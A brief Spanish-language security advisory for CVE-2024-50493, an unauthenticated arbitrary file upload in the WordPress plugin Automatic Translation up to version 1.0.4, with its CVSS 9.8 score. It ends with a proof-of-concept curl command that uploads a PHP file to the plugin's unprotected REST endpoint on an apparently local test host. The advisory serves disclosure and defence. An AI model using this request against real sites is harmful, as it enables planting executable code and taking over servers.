
Automatic Translation <= 1.0.4 - Carga arbitraria de archivos no autenticada
Automatic Translation <= 1.0.4 - Carga Arbitraria de Archivos No Autenticada
El plugin Automatic Translation para WordPress es vulnerable a cargas arbitrarias de archivos debido a la falta de validación del tipo de archivo en todas las versiones hasta la 1.0.4 inclusive. Esto permite que atacantes no autenticados suban archivos arbitrarios en el servidor del sitio afectado, lo que podría posibilitar la ejecución remota de código.
CVE: CVE-2024-50493
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: automatic-translation
curl -X POST \
-F "file_name=info.php" \
-F "file_url=@/tmp/info.php" \
"http://kubernetes.docker.internal/wp-json/automatic-translator/v1/saveDoc"